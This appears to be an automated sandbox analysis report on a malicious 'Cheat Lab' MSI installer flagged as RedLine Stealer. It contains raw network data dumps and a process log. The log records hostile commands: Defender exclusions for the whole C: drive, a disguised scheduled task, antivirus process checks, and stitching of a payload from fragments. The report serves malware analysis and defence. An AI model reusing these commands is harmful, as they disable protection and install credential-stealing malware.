                                                          Data Ascii: ,43,34,32,41,51,63,55,65,58,46,38,39,70,43,4f,31,4e,6c,b4,124,6d,54,9a,67,62,38,44,74,5a,6d,4b,77,43,34,32,a1,53,63,101,68,58,46,38,39,70,43,4f,31,4e,6c,4c,52,6b,54,5a,67,62,38,44,74,5a,6d,4b,77,43,34,60,b5,b6,db,c9,65,58,46,129,79,72,43,4f,41,4e,6c,4c,94
                                                          2024-01-12 22:12:38 UTC1369INData Raw: 2c 35 35 2c 36 35 2c 35 38 2c 34 36 2c 33 38 2c 33 39 2c 37 30 2c 34 33 2c 34 66 2c 33 31 2c 34 65 2c 36 63 2c 34 63 2c 35 32 2c 36 62 2c 35 34 2c 35 61 2c 36 37 2c 36 32 2c 33 38 2c 34 34 2c 37 34 2c 35 61 2c 36 64 2c 34 62 2c 37 37 2c 34 33 2c 33 34 2c 33 32 2c 34 31 2c 35 31 2c 36 33 2c 35 35 2c 36 35 2c 35 38 2c 34 36 2c 33 38 2c 33 39 2c 37 30 2c 34 33 2c 34 66 2c 33 31 2c 34 65 2c 36 63 2c 34 63 2c 35 32 2c 36 62 2c 35 34 2c 35 61 2c 36 37 2c 36 32 2c 33 38 2c 34 34 2c 37 34 2c 35 61 2c 36 64 2c 34 62 2c 37 37 2c 34 33 2c 33 34 2c 33 32 2c 34 31 2c 35 31 2c 36 33 2c 35 35 2c 36 35 2c 35 38 2c 34 36 2c 33 38 2c 33 39 2c 37 30 2c 34 33 2c 34 66 2c 33 31 2c 34 65 2c 36 63 2c 34 63 2c 35 32 2c 36 62 2c 35 34 2c 35 61 2c 36 37 2c 36 32 2c 33 38 2c 34 34
                                                          Data Ascii: ,55,65,58,46,38,39,70,43,4f,31,4e,6c,4c,52,6b,54,5a,67,62,38,44,74,5a,6d,4b,77,43,34,32,41,51,63,55,65,58,46,38,39,70,43,4f,31,4e,6c,4c,52,6b,54,5a,67,62,38,44,74,5a,6d,4b,77,43,34,32,41,51,63,55,65,58,46,38,39,70,43,4f,31,4e,6c,4c,52,6b,54,5a,67,62,38,44
                                                          2024-01-12 22:12:38 UTC1369INData Raw: 63 2c 33 39 2c 34 34 2c 63 64 2c 31 31 64 2c 31 35 36 2c 66 39 2c 39 61 2c 34 34 2c 33 34 2c 39 61 2c 31 31 63 2c 61 31 2c 61 35 2c 35 35 2c 31 34 64 2c 62 63 2c 64 30 2c 33 39 2c 33 39 2c 63 39 2c 31 30 36 2c 62 37 2c 62 39 2c 35 66 2c 61 66 2c 34 63 2c 31 33 61 2c 64 61 2c 62 39 2c 35 61 2c 36 37 2c 31 32 39 2c 33 63 2c 36 38 2c 31 35 39 2c 61 61 2c 61 66 2c 34 62 2c 31 35 66 2c 38 66 2c 62 65 2c 33 33 2c 34 31 2c 61 61 2c 31 32 36 2c 62 64 2c 36 35 2c 64 61 2c 38 38 2c 33 38 2c 31 32 31 2c 63 35 2c 31 33 32 2c 34 66 2c 33 31 2c 61 37 2c 31 32 66 2c 62 34 2c 31 32 61 2c 65 66 2c 39 36 2c 35 61 2c 31 34 66 2c 61 62 2c 31 32 37 2c 34 34 2c 37 34 2c 62 33 2c 31 33 30 2c 31 31 37 2c 31 34 33 2c 31 30 66 2c 31 30 30 2c 66 65 2c 31 30 64 2c 31 31 64 2c 31 32
                                                          Data Ascii: c,39,44,cd,11d,156,f9,9a,44,34,9a,11c,a1,a5,55,14d,bc,d0,39,39,c9,106,b7,b9,5f,af,4c,13a,da,b9,5a,67,129,3c,68,159,aa,af,4b,15f,8f,be,33,41,aa,126,bd,65,da,88,38,121,c5,132,4f,31,a7,12f,b4,12a,ef,96,5a,14f,ab,127,44,74,b3,130,117,143,10f,100,fe,10d,11d,12
                                                          2024-01-12 22:12:38 UTC1369INData Raw: 65 38 2c 36 30 2c 66 38 2c 35 31 2c 63 64 2c 31 34 32 2c 38 34 2c 33 36 2c 63 63 2c 35 38 2c 65 38 2c 31 31 35 2c 64 39 2c 35 65 2c 64 31 2c 34 30 2c 38 39 2c 31 36 66 2c 39 34 2c 35 37 2c 62 61 2c 38 35 2c 66 37 2c 31 31 32 2c 62 31 2c 63 39 2c 62 31 2c 31 31 63 2c 36 62 2c 36 32 2c 38 64 2c 63 66 2c 31 36 30 2c 62 30 2c 66 38 2c 31 33 63 2c 31 30 32 2c 39 31 2c 34 34 2c 62 37 2c 31 30 61 2c 63 35 2c 36 39 2c 65 30 2c 36 36 2c 61 39 2c 31 34 35 2c 38 38 2c 34 31 2c 31 36 36 2c 38 38 2c 35 37 2c 33 32 2c 63 32 2c 37 36 2c 62 36 2c 36 36 2c 63 31 2c 31 33 63 2c 36 63 2c 65 64 2c 36 33 2c 33 38 2c 39 64 2c 63 64 2c 65 35 2c 31 33 33 2c 61 39 2c 64 34 2c 31 30 35 2c 33 38 2c 33 32 2c 39 36 2c 64 63 2c 31 34 66 2c 61 62 2c 66 30 2c 31 34 39 2c 31 32 65 2c 63
                                                          Data Ascii: e8,60,f8,51,cd,142,84,36,cc,58,e8,115,d9,5e,d1,40,89,16f,94,57,ba,85,f7,112,b1,c9,b1,11c,6b,62,8d,cf,160,b0,f8,13c,102,91,44,b7,10a,c5,69,e0,66,a9,145,88,41,166,88,57,32,c2,76,b6,66,c1,13c,6c,ed,63,38,9d,cd,e5,133,a9,d4,105,38,32,96,dc,14f,ab,f0,149,12e,c
                                                          2024-01-12 22:12:38 UTC1369INData Raw: 2c 33 38 2c 37 34 2c 31 31 61 2c 62 34 2c 61 36 2c 62 36 2c 65 33 2c 35 36 2c 38 39 2c 38 39 2c 31 36 66 2c 39 35 2c 35 66 2c 62 63 2c 35 63 2c 31 36 62 2c 63 31 2c 35 61 2c 65 65 2c 31 31 35 2c 36 65 2c 31 34 66 2c 31 35 34 2c 31 32 34 2c 34 34 2c 37 34 2c 64 65 2c 31 32 64 2c 62 66 2c 37 39 2c 66 33 2c 33 35 2c 39 30 2c 39 65 2c 31 31 33 2c 36 37 2c 35 35 2c 62 61 2c 65 33 2c 31 33 32 2c 62 62 2c 31 32 35 2c 37 63 2c 31 33 39 2c 35 34 2c 63 64 2c 35 63 2c 61 66 2c 34 63 2c 39 32 2c 62 65 2c 61 61 2c 65 35 2c 31 34 30 2c 62 39 2c 63 31 2c 61 31 2c 31 36 38 2c 36 39 2c 66 32 2c 31 32 39 2c 37 37 2c 34 33 2c 33 34 2c 62 35 2c 37 65 2c 39 35 2c 37 31 2c 39 38 2c 36 35 2c 35 38 2c 35 35 2c 63 37 2c 31 30 61 2c 37 30 2c 34 33 2c 34 66 2c 31 31 39 2c 31 32 64
                                                          Data Ascii: ,38,74,11a,b4,a6,b6,e3,56,89,89,16f,95,5f,bc,5c,16b,c1,5a,ee,115,6e,14f,154,124,44,74,de,12d,bf,79,f3,35,90,9e,113,67,55,ba,e3,132,bb,125,7c,139,54,cd,5c,af,4c,92,be,aa,e5,140,b9,c1,a1,168,69,f2,129,77,43,34,b5,7e,95,71,98,65,58,55,c7,10a,70,43,4f,119,12d
                                                          2024-01-12 22:12:38 UTC1369INData Raw: 2c 35 38 2c 31 32 65 2c 63 32 2c 37 63 2c 37 31 2c 34 33 2c 64 32 2c 66 35 2c 35 61 2c 66 31 2c 31 30 63 2c 63 36 2c 38 31 2c 62 65 2c 36 61 2c 63 66 2c 64 32 2c 39 63 2c 38 36 2c 37 34 2c 31 35 39 2c 65 32 2c 35 37 2c 31 35 66 2c 62 37 2c 37 37 2c 33 33 2c 34 31 2c 64 34 2c 31 32 37 2c 36 31 2c 65 61 2c 31 31 38 2c 62 62 2c 34 66 2c 63 34 2c 63 35 2c 34 62 2c 64 61 2c 66 62 2c 31 34 35 2c 31 34 35 2c 36 37 2c 31 31 62 2c 66 38 2c 39 36 2c 35 65 2c 38 61 2c 31 32 61 2c 63 31 2c 35 32 2c 31 37 33 2c 39 63 2c 37 35 2c 37 65 2c 31 33 37 2c 31 32 65 2c 33 39 2c 65 61 2c 34 33 2c 39 31 2c 36 33 2c 64 35 2c 63 33 2c 62 35 2c 31 30 38 2c 34 34 2c 33 39 2c 66 33 2c 61 66 2c 37 33 2c 33 35 2c 35 32 2c 31 35 35 2c 65 62 2c 31 35 31 2c 31 36 61 2c 31 35 33 2c 61 66
                                                          Data Ascii: ,58,12e,c2,7c,71,43,d2,f5,5a,f1,10c,c6,81,be,6a,cf,d2,9c,86,74,159,e2,57,15f,b7,77,33,41,d4,127,61,ea,118,bb,4f,c4,c5,4b,da,fb,145,145,67,11b,f8,96,5e,8a,12a,c1,52,173,9c,75,7e,137,12e,39,ea,43,91,63,d5,c3,b5,108,44,39,f3,af,73,35,52,155,eb,151,16a,153,af
                                                          2024-01-12 22:12:38 UTC1369INData Raw: 2c 63 64 2c 35 33 2c 36 62 2c 61 64 2c 62 33 2c 39 61 2c 31 32 32 2c 39 36 2c 61 31 2c 31 33 36 2c 35 65 2c 36 64 2c 61 30 2c 31 30 32 2c 31 32 66 2c 62 66 2c 37 66 2c 34 39 2c 64 63 2c 61 34 2c 36 35 2c 65 38 2c 31 34 30 2c 34 37 2c 63 31 2c 37 61 2c 38 30 2c 62 38 2c 35 38 2c 62 63 2c 34 66 2c 64 36 2c 34 64 2c 31 35 31 2c 62 62 2c 36 38 2c 38 64 2c 31 32 37 2c 62 66 2c 66 61 2c 34 38 2c 37 34 2c 64 64 2c 64 39 2c 36 66 2c 37 62 2c 34 37 2c 31 31 64 2c 31 30 61 2c 31 34 30 2c 31 35 30 2c 31 36 32 2c 64 38 2c 64 31 2c 37 63 2c 34 61 2c 34 30 2c 31 32 32 2c 31 33 65 2c 31 34 32 2c 31 34 65 2c 31 33 30 2c 64 31 2c 64 38 2c 37 30 2c 35 36 2c 37 37 2c 31 33 64 2c 31 31 65 2c 31 36 36 2c 31 36 31 2c 31 33 37 2c 39 39 2c 66 66 2c 31 34 36 2c 66 38 2c 39 38 2c
                                                          Data Ascii: ,cd,53,6b,ad,b3,9a,122,96,a1,136,5e,6d,a0,102,12f,bf,7f,49,dc,a4,65,e8,140,47,c1,7a,80,b8,58,bc,4f,d6,4d,151,bb,68,8d,127,bf,fa,48,74,dd,d9,6f,7b,47,11d,10a,140,150,162,d8,d1,7c,4a,40,122,13e,142,14e,130,d1,d8,70,56,77,13d,11e,166,161,137,99,ff,146,f8,98,
                                                          2024-01-12 22:12:38 UTC1369INData Raw: 36 2c 31 35 33 2c 35 61 2c 35 65 2c 36 37 2c 36 32 2c 31 33 37 2c 62 39 2c 31 36 38 2c 31 34 32 2c 31 32 66 2c 63 61 2c 37 38 2c 34 33 2c 38 64 2c 38 62 2c 61 30 2c 61 66 2c 31 32 63 2c 31 31 38 2c 62 61 2c 65 33 2c 31 33 32 2c 62 62 2c 31 32 35 2c 61 38 2c 39 36 2c 61 35 2c 62 63 2c 38 33 2c 62 30 2c 35 62 2c 39 35 2c 36 62 2c 65 31 2c 61 37 2c 31 35 33 2c 62 39 2c 31 32 30 2c 35 32 2c 31 36 66 2c 35 61 2c 36 64 2c 64 36 2c 31 37 35 2c 39 39 2c 62 64 2c 61 66 2c 31 33 64 2c 31 35 30 2c 37 38 2c 63 31 2c 63 37 2c 39 61 2c 34 36 2c 36 62 2c 31 31 34 2c 64 61 2c 36 33 2c 61 39 2c 62 65 2c 35 32 2c 62 32 2c 64 35 2c 39 37 2c 31 36 33 2c 36 33 2c 31 31 31 2c 36 64 2c 63 38 2c 62 64 2c 31 30 34 2c 65 38 2c 37 31 2c 66 38 2c 31 31 33 2c 64 64 2c 37 65 2c 66 65
                                                          Data Ascii: 6,153,5a,5e,67,62,137,b9,168,142,12f,ca,78,43,8d,8b,a0,af,12c,118,ba,e3,132,bb,125,a8,96,a5,bc,83,b0,5b,95,6b,e1,a7,153,b9,120,52,16f,5a,6d,d6,175,99,bd,af,13d,150,78,c1,c7,9a,46,6b,114,da,63,a9,be,52,b2,d5,97,163,63,111,6d,c8,bd,104,e8,71,f8,113,dd,7e,fe
                                                          2024-01-12 22:12:38 UTC1369INData Raw: 2c 31 32 36 2c 33 34 2c 33 32 2c 34 31 2c 62 39 2c 31 32 33 2c 62 65 2c 61 37 2c 35 38 2c 39 64 2c 31 32 30 2c 61 39 2c 39 65 2c 34 33 2c 34 66 2c 38 61 2c 61 37 2c 66 31 2c 31 30 63 2c 63 36 2c 37 39 2c 65 31 2c 61 30 2c 36 64 2c 62 32 2c 61 30 2c 62 38 2c 64 61 2c 39 63 2c 36 64 2c 31 33 34 2c 31 33 62 2c 34 33 2c 33 34 2c 33 32 2c 61 39 2c 31 31 39 2c 63 63 2c 39 37 2c 36 35 2c 61 66 2c 31 32 65 2c 38 39 2c 36 37 2c 37 30 2c 34 33 2c 61 38 2c 38 61 2c 64 33 2c 31 32 63 2c 63 30 2c 38 31 2c 66 38 2c 61 32 2c 36 30 2c 37 36 2c 31 31 39 2c 33 39 2c 61 65 2c 61 34 2c 62 34 2c 64 33 2c 38 36 2c 31 33 39 2c 62 37 2c 33 64 2c 62 35 2c 31 33 39 2c 38 32 2c 37 32 2c 64 61 2c 61 64 2c 35 39 2c 34 36 2c 33 38 2c 61 33 2c 39 30 2c 39 62 2c 62 35 2c 36 61 2c 39 34
                                                          Data Ascii: ,126,34,32,41,b9,123,be,a7,58,9d,120,a9,9e,43,4f,8a,a7,f1,10c,c6,79,e1,a0,6d,b2,a0,b8,da,9c,6d,134,13b,43,34,32,a9,119,cc,97,65,af,12e,89,67,70,43,a8,8a,d3,12c,c0,81,f8,a2,60,76,119,39,ae,a4,b4,d3,86,139,b7,3d,b5,139,82,72,da,ad,59,46,38,a3,90,9b,b5,6a,94


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:23:11:56
                                                          Start date:12/01/2024
                                                          Path:C:\Windows\System32\msiexec.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Cheat.Lab.2.7.2.msi"
                                                          Imagebase:0x7ff62a580000
                                                          File size:69'632 bytes
                                                          MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:1
                                                          Start time:23:11:56
                                                          Start date:12/01/2024
                                                          Path:C:\Windows\System32\msiexec.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\msiexec.exe /V
                                                          Imagebase:0x7ff62a580000
                                                          File size:69'632 bytes
                                                          MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:false

                                                          General

                                                          Target ID:2
                                                          Start time:23:11:56
                                                          Start date:12/01/2024
                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 30FEA9F9E3926AA1391EB6E446524DF5 C
                                                          Imagebase:0xbb0000
                                                          File size:59'904 bytes
                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:3
                                                          Start time:23:12:01
                                                          Start date:12/01/2024
                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding F28D3D46A9F6C7BEC118E0AE5C649DD3
                                                          Imagebase:0xbb0000
                                                          File size:59'904 bytes
                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:4
                                                          Start time:23:12:02
                                                          Start date:12/01/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss87C.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi86A.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr86B.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr86C.txt" -propSep " :<->: " -testPrefix "_testValue."
                                                          Imagebase:0x7ff788560000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:5
                                                          Start time:23:12:02
                                                          Start date:12/01/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:6
                                                          Start time:23:12:03
                                                          Start date:12/01/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -Command "& { & 'Add-MpPreference' -ExclusionExtension '.dll', '.exe' -ExclusionPath C: -Force }
                                                          Imagebase:0x7ff788560000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:9
                                                          Start time:23:12:20
                                                          Start date:12/01/2024
                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding AF5482846545A3FBF6C3EBE62A323063 E Global\MSI0000
                                                          Imagebase:0xbb0000
                                                          File size:59'904 bytes
                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:10
                                                          Start time:23:12:21
                                                          Start date:12/01/2024
                                                          Path:C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\config
                                                          Imagebase:0x7ff7bad30000
                                                          File size:789'504 bytes
                                                          MD5 hash:E1985F2668B7617E122FE727315B6D07
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 0%, ReversingLabs
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:11
                                                          Start time:23:12:22
                                                          Start date:12/01/2024
                                                          Path:C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\config
                                                          Imagebase:0x7ff7bad30000
                                                          File size:789'504 bytes
                                                          MD5 hash:E1985F2668B7617E122FE727315B6D07
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:14
                                                          Start time:23:13:10
                                                          Start date:12/01/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:powershell -Command "Register-ScheduledTask -TaskName 'Y29ubmVjdDc0MQ==' -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe') -Trigger (New-ScheduledTaskTrigger -At (Get-Date).AddMinutes(1) -Once) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable) -Force"
                                                          Imagebase:0x7ff788560000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:.Net C# or VB.NET
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:15
                                                          Start time:23:13:10
                                                          Start date:12/01/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:16
                                                          Start time:23:13:19
                                                          Start date:12/01/2024
                                                          Path:C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe
                                                          Imagebase:0x400000
                                                          File size:1'073'657'860 bytes
                                                          MD5 hash:B9DD622108F62A2288DEB12C8A7D85BA
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:17
                                                          Start time:23:13:20
                                                          Start date:12/01/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:19
                                                          Start time:23:13:22
                                                          Start date:12/01/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\cmd.exe" /k cmd < Roommates & exit
                                                          Imagebase:0x240000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:20
                                                          Start time:23:13:22
                                                          Start date:12/01/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:21
                                                          Start time:23:13:23
                                                          Start date:12/01/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:cmd
                                                          Imagebase:0x240000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:22
                                                          Start time:23:13:23
                                                          Start date:12/01/2024
                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:tasklist
                                                          Imagebase:0xc0000
                                                          File size:79'360 bytes
                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:23
                                                          Start time:23:13:23
                                                          Start date:12/01/2024
                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
                                                          Imagebase:0x890000
                                                          File size:29'696 bytes
                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:24
                                                          Start time:23:13:24
                                                          Start date:12/01/2024
                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:tasklist
                                                          Imagebase:0xc0000
                                                          File size:79'360 bytes
                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:25
                                                          Start time:23:13:24
                                                          Start date:12/01/2024
                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:findstr /I "wrsa.exe"
                                                          Imagebase:0x890000
                                                          File size:29'696 bytes
                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:26
                                                          Start time:23:13:25
                                                          Start date:12/01/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:cmd /c mkdir 28945
                                                          Imagebase:0x240000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:27
                                                          Start time:23:13:25
                                                          Start date:12/01/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:cmd /c copy /b Dns + Pontiac + Milfhunter + Ruling + Supervisor 28945\Carbon.pif
                                                          Imagebase:0x240000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:28
                                                          Start time:23:13:25
                                                          Start date:12/01/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:cmd /c copy /b Entered + Conferences 28945\w
                                                          Imagebase:0x240000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:29
                                                          Start time:23:13:25
                                                          Start date:12/01/2024
                                                          Path:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif
                                                          Wow64 process (32bit):true
                                                          Commandline:28945\Carbon.pif 28945\w
                                                          Imagebase:0x8f0000
                                                          File size:946'784 bytes
                                                          MD5 hash:848164D084384C49937F99D5B894253E
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000003.2893690929.00000000039AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000003.2894225231.00000000039A9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000003.2894002689.0000000003959000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000003.2951972819.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000003.2894424466.00000000039FB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000003.2950664507.00000000039A9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000003.2893791274.00000000038DC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000003.2950664507.0000000003A02000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000003.2894095671.0000000004501000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
